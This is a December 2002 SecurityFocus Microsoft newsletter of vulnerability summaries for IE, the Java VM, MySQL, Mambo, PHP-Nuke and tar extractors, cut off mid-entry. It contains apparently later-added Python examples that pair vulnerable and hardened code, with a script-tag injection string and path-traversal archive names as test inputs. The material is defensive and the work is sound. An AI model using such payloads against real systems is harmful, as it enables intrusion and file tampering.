SecurityFocus Microsoft Newsletter #118
From: Marc Fossi (mfossi@securityfocus.com)
Date: 12/23/02
Date: Mon, 23 Dec 2002 12:27:16 -0700 (MST) From: Marc Fossi <mfossi@securityfocus.com> To: Focus-MS <focus-ms@securityfocus.com>
SecurityFocus Microsoft Newsletter #118
---------------------------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Microsoft Baseline Security Analyzer V1.1
2. Evaluating Network Intrusion Detection Signatures, Part Three
3. OpenAV: Developing Open Source AntiVirus Engines
4. SecurityFocus DPP Program
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
II. MICROSOFT VULNERABILITY SUMMARY
1. Microsoft Internet Explorer PNG Deflate Heap Corruption...
2. Microsoft Windows SMB Signing Vulnerability
3. Deerfield VisNetic WebSite Cross Site Scripting Vulnerability
4. Microsoft Java Virtual Machine COM Object Access Validation...
5. Microsoft Java Virtual Machine CODEBASE Parameter File...
6. MySQL COM_CHANGE_USER Password Length Account Compromise...
7. MySQL libmysqlclient Library Read_Rows Buffer Overflow...
8. MySQL libmysqlclient Library Read_One_Row Buffer Overflow...
9. Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability
10. Bea Systems WebLogic Xerces XML Parser Denial Of Service...
11. Microsoft Java Virtual Machine Standard Security Manager...
12. Microsoft Java Virtual Machine Java Object Instantiation...
13. Mambo Site Server Account Registration HTML Injection...
14. Mambo Site Server Path Disclosure Vulnerability
15. Captaris Infinite WebMail HTML Injection Vulnerability
16. EServ Buffer Overflow Vulnerability
17. PKZip Tar Hostile Destination Path Vulnerability
18. Microsoft Java Virtual Machine user.dir Access Information...
19. VIM ModeLines Arbitrary Command Execution Vulnerability
20. PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability
21. Microsoft Java Virtual Machine Multiple Vulnerabilities
22. MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
23. Microsoft Java Virtual Machine URL Parsing Vulnerability
24. Microsoft Java Virtual Machine JDBC API Access Vulnerability
25. PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities
26. Symantec Enterprise Firewall RealAudio Proxy Buffer Overflow...
27. MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing...
28. Cypherix Cryptainer Information Disclosure Vulnerability
29. PHP-Nuke Web Mail Script Injection Vulnerability
30. PHP-Nuke Multiple Path Disclosure Vulnerabilities
31. ZipMagic Tar Hostile Destination Path Vulnerability
32. WinZip Tar Hostile Destination Path Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Removing locking user from CTRL-ALT-DEL window - NT 4.0 (Thread)
2. Logging Terminal Services Access? (Thread)
3. ipsecpol on Windows 2000 (Thread)
4. SecurityFocus Microsoft Newsletter #117 (Thread)
5. Users Peeved at Microsoft Security Effort (Thread)
6. IIS 4 Security (Thread)
7. Exchange 5.5 delivery receipts (Thread)
8. Bulletin MS02-069 (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. ipPulse
2. BVRP Mail Warden
3. Silent Watch
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Lepton's Crack v1.0.1
2. perltrash v0.3
3. Opticon|Users 2002
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Microsoft Baseline Security Analyzer V1.1
By Mike Fahland, Eric Schultze
Earlier this month, Microsoft released version 1.1 of the Microsoft
Baseline Security Analyzer (MBSA). This article will offer a brief
overview of MBSA.
http://online.securityfocus.com/infocus/1649
2. Evaluating Network Intrusion Detection Signatures, Part Three
by Karen Kent
In this three-part series of articles, we are presenting recommendations
that will help readers to evaluate the quality of network intrusion
detection (NID) signatures, either through hands-on testing or through
careful consideration of third-party product reviews and comparisons. The
first installment discussed some of the basics of evaluating NID signature
quality, as well as selecting attacks to be used in testing. The second
installment concluded the discussion of criteria for choosing attacks and
provided recommendations for generating attacks and creating a good
testing environment. This article will wrap up the series by examining
other ways of generating attacks with other security-related tools and by
manually creating your own attacks.
http://online.securityfocus.com/infocus/1651
3. OpenAV: Developing Open Source AntiVirus Engines
by Costin G. Raiu
This article will take a look at the OpenAntivirus AV engine, assess its
progress so far, and offer some suggestions of how the developers can
continue to develop it. While some of the commentary in the following
sections may be fairly critical, the purpose of this paper is not to flame
the OpenAV project or its developers but, on the contrary, to salute their
efforts. Hopefully, this article and the comments herein will make a
significant contribution to the development of a viable, working open
source antivirus product.
http://online.securityfocus.com/infocus/1650
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
Optional Workshops March 8, 9, 12, 13, & 14; Vendor Expo March 10 & 11.
Solutions to today’s security concerns; hands-on experts; blockbuster
vendor expo; the CISO Executive Summit; invaluable networking
opportunities. InfoSec World has it all!
Go to: http://www.misti.com/10/os03nl37inf.html
II. BUGTRAQ SUMMARY
-------------------
1. Microsoft Internet Explorer PNG Deflate Heap Corruption Vulnerability
BugTraq ID: 6366
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6366
Summary:
A heap corruption vulnerability has been reported for Microsoft Internet
Explorer 5.01 through 6.0.
The vulnerability is related to the way that Microsoft Internet Explorer
(MSIE) interprets PNG image data. Specifically, the 'inflate_fast()'
function within 'pngfilt.dll' does not properly handle invalid length
codes within PNG image files.
An attacker can exploit this vulnerability by tricking a user into viewing
a maliciously constructed PNG image file. When the image file is rendered
by the 'pngfilt.dll' library, it will trigger the heap corruption
condition and overwrite critical areas in memory. Any malicious
attacker-supplied code will be executed with elevated privileges.
It should be noted that applications which depend on MSIE to render PNG
files are also affected.
Internet Explorer 6.0 with Service Pack 1 is not affected by this issue.
2. Microsoft Windows SMB Signing Vulnerability
BugTraq ID: 6367
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6367
Summary:
Microsoft Windows 2000 and XP contain a new feature that can be set in
group policy allowing SMB packets to be digitally signed. There are four
settings that govern the signing of the SMB packets; two for acting as a
server and two for acting as a client. The system can be configured to
allow signing, disallow signing, or require signing. The default setting
is to allow signing, but not require it.
When two hosts establish an SMB session, negotiation of the digital
signing level occurs. The systems determine what level of signing each
requires and whether a connection can be established. If one system
cannot meet the other system's requirements, the communication channel is
not established.
Due to a flaw in the way the signing negotiation is implemented, an
attacker can malform a negotiation packet through a man-in-the-middle
attack to cause the target system to silently drop its signing requirement
for that particular session. This could allow the attacker to then modify
the SMB packets undetected by the receiving system since the digital
signature is not checked. The attacker would have to exploit this
vulnerability once for each SMB session to be modified.
It is important to note that when a client logs into a domain, the group
policy is transmitted from the server to the client using signed SMB
packets. This could allow a knowledgeable attacker to modify the group
policy settings that are applied to the client.
3. Deerfield VisNetic WebSite Cross Site Scripting Vulnerability
BugTraq ID: 6369
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6369
Summary:
VisNetic Website is a web server that supports multiple domains and allows
TLS/SSL secured domains. It is available for the Microsoft Windows
operating system.
When a requested page does not exist VisNetic Website will construct a
customized 404 page containing a link to the referring page. The referring
address is taken from the HTTP 'referer' header.
A vulnerability has been discovered in VisNetic Website when generating a
404 page for a non-existent resource. The issue is due to insufficient
sanitization of the HTTP 'referer' header. It is possible to cause
arbitrary script code to be executed within the context of the visited 404
page by embedding script code into the HTTP 'referer' header.
An attacker could exploit this issue to steal cookie-based authentication
credentials, which could be used to hijack a legitimate user's session.
It should be noted that this vulnerability was discovered in VisNetic
Website 3.5.13.1. It is not yet known whether this issue also affects
earlier versions.
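The following is an added example (not VisNetic's code) of the 404 handler pattern described above, beside a hardened version that only emits the back-link when the Referer parses as an http(s) URL and HTML-escapes it; the page layout and function names are assumptions.

```python
import html
from urllib.parse import urlsplit


def vulnerable_404(referer: str) -> str:
    """Model of the flaw: the Referer header is interpolated into the
    page verbatim, so tags in it become part of the document."""
    return (
        "<html><body><h1>404 Not Found</h1>"
        f'<p>Back to <a href="{referer}">{referer}</a></p>'
        "</body></html>"
    )


def safe_back_link(referer: str) -> "str | None":
    """Return the header escaped for use in HTML, or None if it is unusable.

    Two checks: the value must be an absolute http/https URL (rejects
    javascript: and data: schemes), and every HTML metacharacter is
    escaped, including quotes, because the value lands in an attribute.
    """
    if not referer:
        return None
    parts = urlsplit(referer)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return html.escape(referer, quote=True)


def hardened_404(referer: str) -> str:
    """Same page, but the link is omitted unless the header is sane."""
    link = safe_back_link(referer)
    back = f'<p>Back to <a href="{link}">{link}</a></p>' if link else ""
    return f"<html><body><h1>404 Not Found</h1>{back}</body></html>"


if __name__ == "__main__":
    # Constructed header value: a URL whose path carries a tag.
    sample = 'http://example.test/page"><script>alert(1)</script>'
    print(vulnerable_404(sample))
    print(hardened_404(sample))
```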
4. Microsoft Java Virtual Machine COM Object Access Validation Vulnerability
BugTraq ID: 6371
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6371
Summary:
The Microsoft Java Virtual Machine (JVM) implements the Java runtime
environment for Microsoft Internet Explorer. A vulnerability has been
discovered in the Microsoft JVM.
The vulnerability is due to insufficient checks in the JVM that allow
malicious, untrusted applets access to COM (Component Object Model)
objects. COM objects are used by the system to perform a variety of
functions, including the ability to modify data.
An attacker can exploit this vulnerability by creating a malicious applet
that invokes certain COM objects. Due to insufficient security checks
performed by the JVM, it is possible for the untrusted applet to access
the requested, sensitive COM object. Through the manipulation of the
object, the attacker can modify arbitrary files on the vulnerable system
and allow the attacker to obtain total control of the system.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
5. Microsoft Java Virtual Machine CODEBASE Parameter File Disclosure Vulnerability
BugTraq ID: 6372
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6372
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability results from a specially constructed 'CODEBASE'
parameter specified as part of an 'APPLET' HTML tag. The 'CODEBASE'
parameter tells the JVM where the applet is located. If an applet is
located on a local hard drive or resource, the applet has access to all
files and directories that lie directly under the path of its execution.
Due to insufficient parsing of HTML tags performed by the JVM, it may be
possible for a malicious applet to misrepresent its own location.
An attacker can exploit this vulnerability to load a malicious applet from
a remote site and trick the Virtual Machine into thinking that it was
executed from a trusted location, such as the vulnerable system's hard
drive. This will allow an attacker to obtain access to potentially
sensitive files on a vulnerable system or on network shares the user has
access to. The vendor has stated that the vulnerability will only allow an
attacker to obtain read access to files.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
6. MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
BugTraq ID: 6373
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6373
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
A flaw in the password authentication mechanism for MySQL may make it
possible for an authenticated database user to compromise the accounts of
other database users.
The flaw lies in the fact that the server uses a string returned by the
client when the COM_CHANGE_USER command is issued to iterate through a
comparison when attempting to authenticate the password. The server does
not verify that the password string is of sufficient length. As a result,
it is possible for a client to submit a single character as a response and
that single character will be compared to the expected password. If this
character matches the first character in the password, MySQL will
reportedly authenticate the user. The range of the valid character set
for passwords is 32 characters, which means that a malicious user can
authenticate after a maximum of 32 attempts if they cycle through all of
the valid characters.
Since this flaw exists in the COM_CHANGE_USER command, an attacker must
have access to a database user account to exploit the issue. They must
also know the username of the account they are attempting to compromise.
Depending on how the database has been deployed, this may allow for a
malicious user to compromise the MySQL root account.
This issue is related to the vulnerability described in Bugtraq ID 975.
The problem was not sufficiently addressed in the COM_CHANGE_USER command.
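An added example (a model, not MySQL's source) of the comparison flaw described above: the loop in the vulnerable check is bounded by the client's reply, so a one-character reply is only compared against the first character of the expected value, while the hardened check verifies the length first and compares in constant time. The 32-symbol alphabet and the password value are constructed.

```python
import hmac

# Constructed 32-symbol set, standing in for the page's "32 valid characters".
ALPHABET = "0123456789abcdefghijklmnopqrstuv"


def vulnerable_check(expected: str, supplied: str) -> bool:
    """Model of the flaw: iterate over the CLIENT's string and compare
    position by position. An empty reply is refused (the earlier empty-
    password case), but any non-empty prefix of the expected value passes."""
    if not supplied:
        return False
    for i, ch in enumerate(supplied):
        if i >= len(expected) or ch != expected[i]:
            return False
    return True


def hardened_check(expected: str, supplied: str) -> bool:
    """Fix: refuse anything that is not exactly the expected length, then
    compare the full value with a constant-time comparison so that the
    number of matching leading characters is not observable either."""
    if len(supplied) != len(expected):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def accepted_single_char_replies(check, expected: str) -> int:
    """How many one-character replies over ALPHABET a given check accepts.
    For the vulnerable check this is 1 (the first character of the
    expected value), which is the page's 'at most 32 attempts' observation;
    for the hardened check it is 0."""
    return sum(1 for ch in ALPHABET if check(expected, ch))


if __name__ == "__main__":
    secret = "7k2p"  # constructed expected value over ALPHABET
    print(vulnerable_check(secret, "7"), hardened_check(secret, "7"))
    print(accepted_single_char_replies(vulnerable_check, secret),
          accepted_single_char_replies(hardened_check, secret))
```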
7. MySQL libmysqlclient Library Read_Rows Buffer Overflow Vulnerability
BugTraq ID: 6370
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6370
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL contains a library called libmysqlclient that allows queries to be
performed against the MySQL server database. A problem exists in the
read_rows function of the libmysqlclient library that could result in a
buffer overflow.
When the MySQL client performs a SELECT query on the database, the
read_rows function loops through the returned fields, copying them to a
local buffer. The problem occurs because the function does not verify
that the size of the returned fields is smaller than the buffer to which
they are being copied.
Additionally, each row is terminated with a '\0' without verifying that
there is sufficient space within the destination buffer.
This vulnerability may be exploited to cause a denial of service or to
execute arbitrary code in the security context of the MySQL client
application. Anything that is linked against libmysql may also be
affected by this issue.
8. MySQL libmysqlclient Library Read_One_Row Buffer Overflow Vulnerability
BugTraq ID: 6374
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6374
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL contains a library called libmysqlclient that allows queries to be
performed against the MySQL server database. A problem exists in the
read_one_row function of the libmysqlclient library that could result in a
buffer overflow.
When the MySQL client fetches a row from the database, read_one_row stores
the field and the field size without verifying that the data will not
overrun the buffer. After storing the pointer to a field, the function
terminates the previous field with a '\0' and moves on to the next field.
Since the data is not verified against the size of the buffer, a malformed
packet can supply an exceptionally long field size and have arbitrary
memory overwritten with a '\0', potentially causing the client to crash.
Successful exploitation will most likely result in a denial of service
against the MySQL client application. Though it hasn't been confirmed, it
may be possible with some client implementations to cause execution of
arbitrary code.
9. Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability
BugTraq ID: 6376
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6376
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
A problem with Mambo may make it possible for a remote user to gain access
to sensitive information.
It has been reported that Mambo enables a script by default that may
reveal sensitive information. The phpinfo.php script is packaged with
Mambo, and installed by default in the administrator subdirectory. A
remote user may use this script to gain information about the server,
including path and environment information.
This vulnerability could lead to a more directed attack against hosts.
An attacker may access this script via
http://www.example.com/mambo/administrator/phpinfo.php.
10. Bea Systems WebLogic Xerces XML Parser Denial Of Service Vulnerability
BugTraq ID: 6378
Remote: No
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6378
Summary:
BEA Systems WebLogic Server is an enterprise level web and wireless
application server for Microsoft Windows and most Unix and Linux
distributions.
A problem with WebLogic could allow an attacker to deny service to
legitimate users.
A vulnerability in the handling of XML documents has been discovered.
XML documents are parsed by the Xerces component of the WebLogic
infrastructure. By parsing a malicious XML document locally, it is
possible to cause the WebLogic server process to hang.
This issue could allow an attacker with the ability to place files on the
vulnerable host to deny service to legitimate users. Normal service would
resume only when the process is killed, and manually restarted.
Additionally, this vulnerability could continue to be exploited until the
malicious XML file is removed.
11. Microsoft Java Virtual Machine Standard Security Manager Access Validation Vulnerability
BugTraq ID: 6381
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6381
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
This vulnerability is due to a flaw in the access validation check
performed by the Virtual Machine's Standard Security Manager. This
vulnerability could allow an attacker to suppress the execution of Java
applets in the current Internet Explorer browser session.
The Standard Security Manager contains a list of Java applets and modules
that applets should not be allowed to invoke. Normally, only the Virtual
Machine itself should be allowed to write to the Standard Security
Manager. However, due to insufficient access validation controls, any
Java applet can write to the Standard Security Manager. This could allow
an attacker to add other applets to the banned list, preventing the
applets from executing or being executed by other applets.
Exploitation of this vulnerability would only affect the current Internet
Explorer browser session. Other sessions running in parallel to or after
the affected session would not be affected. Simply closing the affected
browser session would correct the results of exploitation.
12. Microsoft Java Virtual Machine Java Object Instantiation Denial Of Service Vulnerability
BugTraq ID: 6382
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6382
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability may allow an attacker to cause the hosting application
to fail when a user executes a malicious applet. Restarting the hosting
application will restore normal functionality.
The vulnerability is due to the way the JVM initializes some Java objects.
An attacker can exploit this vulnerability by creating a Java applet that
will create an incorrectly initialized Java object. This will result in
the corruption of memory of the hosting application and its subsequent
failure.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
13. Mambo Site Server Account Registration HTML Injection Vulnerability
BugTraq ID: 6386
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6386
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
Mambo Site Server does not sufficiently sanitize HTML submitted through
the "Your Name" form field during account registration. Data in this
field may be output to other users, such as in articles. Though it has
been reported that an administrative user must approve articles before
they are displayed to other users, it is possible that malicious script
code may be displayed to the administrative user when an article is
reviewed for approval. This possibility has not been confirmed.
An attacker may include arbitrary HTML and script code in the "Your Name"
field and when this information is viewed by other users, the
attacker-supplied code will execute in their web client in the security
context of the site.
Exploitation may allow for theft of cookie-based authentication
credentials or other attacks.
It is possible that other account registration form fields also do not
sufficiently sanitize HTML.
14. Mambo Site Server Path Disclosure Vulnerability
BugTraq ID: 6387
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6387
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
A vulnerability has been discovered in Mambo Site Server. Requesting the
'index.php' script with an invalid parameter will cause an error page to
be generated containing the path of the Mambo script.
This will disclose sensitive information about the layout of the
filesystem of the host running the vulnerable software. Information of
this nature may aid in mounting further attacks against the host.
It should be noted that this vulnerability was reported in Mambo Site
Server 4.0.11. It is not yet known whether other versions are affected.
15. Captaris Infinite WebMail HTML Injection Vulnerability
BugTraq ID: 6411
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6411
Summary:
Captaris Infinite WebMail is a Web server application that provides HTML
access to email stored in SMTP, POP3, and IMAP mail systems. It is
available for the Microsoft Windows operating system.
A vulnerability has been discovered in Infinite WebMail. Due to
insufficient sanitization of HTML content it is possible to embed
arbitrary script code within an HTML email. The problem occurs in the <p>
and <b> HTML tags.
When an unsuspecting user of the vulnerable software views the malicious
message, the attacker-supplied code will execute in their web browser in
the security context of the webmail system.
This may allow an attacker to steal cookie-based authentication
credentials from users of the webmail system. Other attacks are also
possible.
16. EServ Buffer Overflow Vulnerability
BugTraq ID: 6391
Remote: Yes
Date Published: Dec 13 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6391
Summary:
EServ is a combination Mail, News, Web, FTP and Proxy Server for Microsoft
Windows 9x/NT/2000 systems.
A buffer overflow vulnerability has been reported for EServ. The
vulnerability occurs when EServ receives an overly long stream of data for
any of its listening services.
An attacker can exploit this vulnerability by sending an overly long
stream of data, consisting of at least 5080000 characters, to any of the
ports that EServ is listening on. This will trigger the buffer overflow
condition and will result in the EServ process crashing.
Although unconfirmed, it may be possible for an attacker to gain control
over the execution of the vulnerable process and execute malicious
attacker-supplied code.
This vulnerability was reported for EServ 2.97 and 2.99; it is likely that
previous versions are also affected.
17. PKZip Tar Hostile Destination Path Vulnerability
BugTraq ID: 6419
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6419
Summary:
PKZip is prone to a security vulnerability when unpacking .tar archives.
The problem is in the handling of pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
An attacker may exploit this condition by specifying a relative extraction
path in a malicious .tar that points to sensitive or critical files, such
as system binaries.
This issue was reported in PKZip for Microsoft Windows platforms. It is
not known if other platforms are also affected.
This issue is similar to the issue described in Bugtraq ID 5933, but
affects how .tar archives are handled specifically.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
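An added example (not PKZip's code) of the check an extractor needs against the hostile-path issue described above: each entry's name is resolved against the destination directory and refused if it lands outside it, with symbolic and hard links checked the same way. The archive is constructed in memory with one benign entry and two hostile ones; the destination path is an assumption.

```python
import io
import os
import tarfile
from typing import List


def _inside(root: str, path: str) -> bool:
    """True if path (already resolved) is root or lies beneath it."""
    return os.path.commonpath([root, path]) == root


def unsafe_members(data: bytes, dest: str) -> List[str]:
    """Return the names of archive entries that would be written outside dest.

    A name like '../../x' or '/abs/x' joins and resolves to a path whose
    common prefix with dest is shorter than dest itself, so it is refused.
    Links are refused when their target escapes dest, since a later entry
    could be written through them.
    """
    root = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(root, member.name))
            if not _inside(root, target):
                bad.append(member.name)
                continue
            if member.issym():
                # Symlink targets are relative to the link's own directory.
                link = os.path.realpath(
                    os.path.join(os.path.dirname(target), member.linkname))
                if not _inside(root, link):
                    bad.append(member.name)
            elif member.islnk():
                # Hard link targets are relative to the archive root.
                link = os.path.realpath(os.path.join(root, member.linkname))
                if not _inside(root, link):
                    bad.append(member.name)
    return bad


def extract_safely(data: bytes, dest: str) -> None:
    """Refuse the whole archive if any entry is hostile, then extract."""
    bad = unsafe_members(data, dest)
    if bad:
        raise ValueError(f"refusing archive with hostile paths: {bad}")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        tar.extractall(dest)


def build_sample_archive() -> bytes:
    """Constructed .tar: one benign entry, one '../' escape, one absolute path."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in (
            ("docs/readme.txt", b"benign"),
            ("../../evil.txt", b"escapes via parent references"),
            ("/abs/path.txt", b"escapes via an absolute name"),
        ):
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    print(unsafe_members(build_sample_archive(), "/tmp/extract-sample"))
```

Python 3.12 and later ship the same kind of check as tarfile extraction filters (`filter="data"`), which reject such entries at extraction time.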
18. Microsoft Java Virtual Machine user.dir Access Information Disclosure Vulnerability
BugTraq ID: 6380
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6380
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability may allow an attacker to obtain access to the user.dir
system property. The user.dir property contains information about the
current working directory of the hosting application.
An attacker can exploit this issue by enticing a user to execute a
malicious applet. The JVM does not restrict access to the user.dir system
property to untrusted Java applets and will result in the malicious applet
obtaining access to user.dir. This will allow an attacker to obtain
information that may be used to launch further attacks against a
vulnerable system.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
19. VIM ModeLines Arbitrary Command Execution Vulnerability
BugTraq ID: 6384
Remote: No
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6384
Summary:
vim is a freely available, open source text editor. It is available for
Unix, Linux, and Microsoft Operating Systems.
A problem with vim may make it possible to execute arbitrary commands on a
vulnerable host.
It has been reported that a problem exists in vim with modelines.
Modelines are instructions placed at the beginning and end of text files
to instruct the editor on how to handle certain elements of the file.
Due to insufficient handling of input, it may be possible to execute
arbitrary commands through the modelines function.
This vulnerability could allow an attacker to execute arbitrary commands
with the privileges of the vim user. Through social engineering, this may
give an attacker the ability to gain remote access to the vulnerable host.
20. PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability
BugTraq ID: 6399
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6399
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
A vulnerability has been discovered in a web mail module available for
PHP-Nuke. When a user opens an email containing an attachment the file
will be stored in a remotely accessible web directory. The module fails to
filter attachments containing active content, making it possible for an
attacker to access a PHP script located in the user's web directory.
By sending a user a malicious attachment and then accessing the script a
remote attacker is able to cause arbitrary PHP code to be executed on the
target system. This may allow an attacker to access sensitive information
or compile malicious programs designed to open backdoors into the server.
21. Microsoft Java Virtual Machine Multiple Vulnerabilities
BugTraq ID: 6365
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6365
Summary:
Several vulnerabilities have been reported for Microsoft Java Virtual
Machine.
The first vulnerability may allow a malicious Java applet to access COM
(Component Object Model) objects. A malicious Java applet may be able to
access COM objects that allow control of the system. By exploiting this
vulnerability an attacker would be able to take complete control over a
compromised machine.
The second vulnerability may allow an attacker to misrepresent the
location of a malicious Java applet. Through the use of an APPLET HTML
tag, an attacker can specify a false value for the 'CODEBASE' parameter.
The 'CODEBASE' parameter is used to tell a browser where the Java applet
is located. An attacker can exploit this vulnerability to load a malicious
applet from a remote site and trick the Virtual Machine into thinking that
it was executed from a trusted location, such as the vulnerable system's
hard drive. This will allow an attacker to obtain access to potentially
sensitive files on a vulnerable system.
The third vulnerability may allow an attacker to construct a malicious URL
that would load a Java applet from an attacker's site but misrepresent it
as belonging to another, trusted, site. The vulnerability is due to a flaw
in the Virtual Machine's URL parser. An attacker can exploit this
vulnerability to intercept any traffic that the user would send to the
trusted site. This information may be used by an attacker to launch
further attacks against a vulnerable system.
The fourth vulnerability may allow an attacker to access databases used by
the system as another user. This will allow an attacker to obtain read and
write access to the database. This vulnerability is due to the bypassing
of existing security checks of the JDBC (Java Database Connectivity) APIs
by malicious applets.
The fifth vulnerability may allow an attacker to prevent Java applets on
other pages from running. This vulnerability exists due to insufficient
security checks in the Virtual Machine that allows Java applets to write
to the Standard Security Manager. An attacker can exploit this
vulnerability to write to the Standard Security Manager and prevent other
applets from being executed. This vulnerability will allow an attacker to
prevent Java applets from being run only in the current browser session;
any new browser sessions will be unaffected.
The sixth vulnerability may allow an attacker to obtain access to the
user.dir property. The user.dir property contains information about the
current working directory of the hosting application. Exploitation of this
issue may allow an attacker to obtain information that may be used to
launch further attacks against a vulnerable system.
The final vulnerability may allow an attacker to cause the hosting
application to fail when a user visits a malicious site. Restarting the
hosting application will restore normal functionality. The vulnerability
is due to the way the Virtual Machine initializes some Java objects. An
attacker can exploit this vulnerability by creating a Java applet that
will create an incorrectly initialized Java object. This will result in
the corruption of memory of the hosting application and its subsequent
failure.
** At the earliest possible convenience, this record will be divided up
into new vulnerability records where it is appropriate. Existing records
will also be updated to reflect the information contained in the Microsoft
Security Bulletin.
22. MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
BugTraq ID: 6375
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6375
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL is prone to a memory corruption vulnerability in the COM_CHANGE_USER
command.
Due to a lack of sufficient bounds checking for client responses to
password authentication challenges, it may be possible to corrupt
sensitive regions of memory.
It has been reported that it is possible to overwrite the saved
instruction pointer on the stack with bytes generated by the random number
generator of the password verification algorithm. Given enough attempts,
it may be possible for an attacker to change the flow of execution of the
program so that a significant region of memory is returned to, such as a
region containing attacker-supplied instructions. Failed exploitation
attempts will cause the MySQL server to crash, only to be restarted, so it
is possible for an attacker to make multiple exploitation attempts.
Theoretically, an attacker could leverage such a condition to cause
execution of arbitrary code in the security context of the MySQL server
process.
It is believed the attacker must be able to issue a COM_CHANGE_USER
